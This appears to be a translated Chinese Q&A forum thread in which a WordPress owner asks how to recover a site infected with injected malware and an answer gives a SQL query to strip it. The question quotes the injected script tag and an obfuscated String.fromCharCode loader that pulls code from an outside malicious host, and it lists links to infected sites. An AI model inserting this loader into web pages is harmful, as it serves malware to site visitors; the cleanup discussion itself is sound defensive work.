被病毒感染的Wordpress网站；如何备份或恢复？

Question

我的 WordPress 网站感染了恶意代码。我可以做些什么来恢复数据或备份？网站显示空白页面或重定向到某些恶意 URL。下面的代码(和类似的)被注入(inject)了许多页面(还创建了许多不同名称的文件):

<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>

<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>

我的一些受感染网站( 警告 :访问可能会感染):

https://lahuriyaconstruction.com/
https://getnonveg.com/

Answer 1

同样在这里 - 在 phpmyadmin 中打开您的数据库并在 SQL 框中输入以下内容:

UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%' 

它将清除脚本中的所有帖子，但您必须查看条目的来源。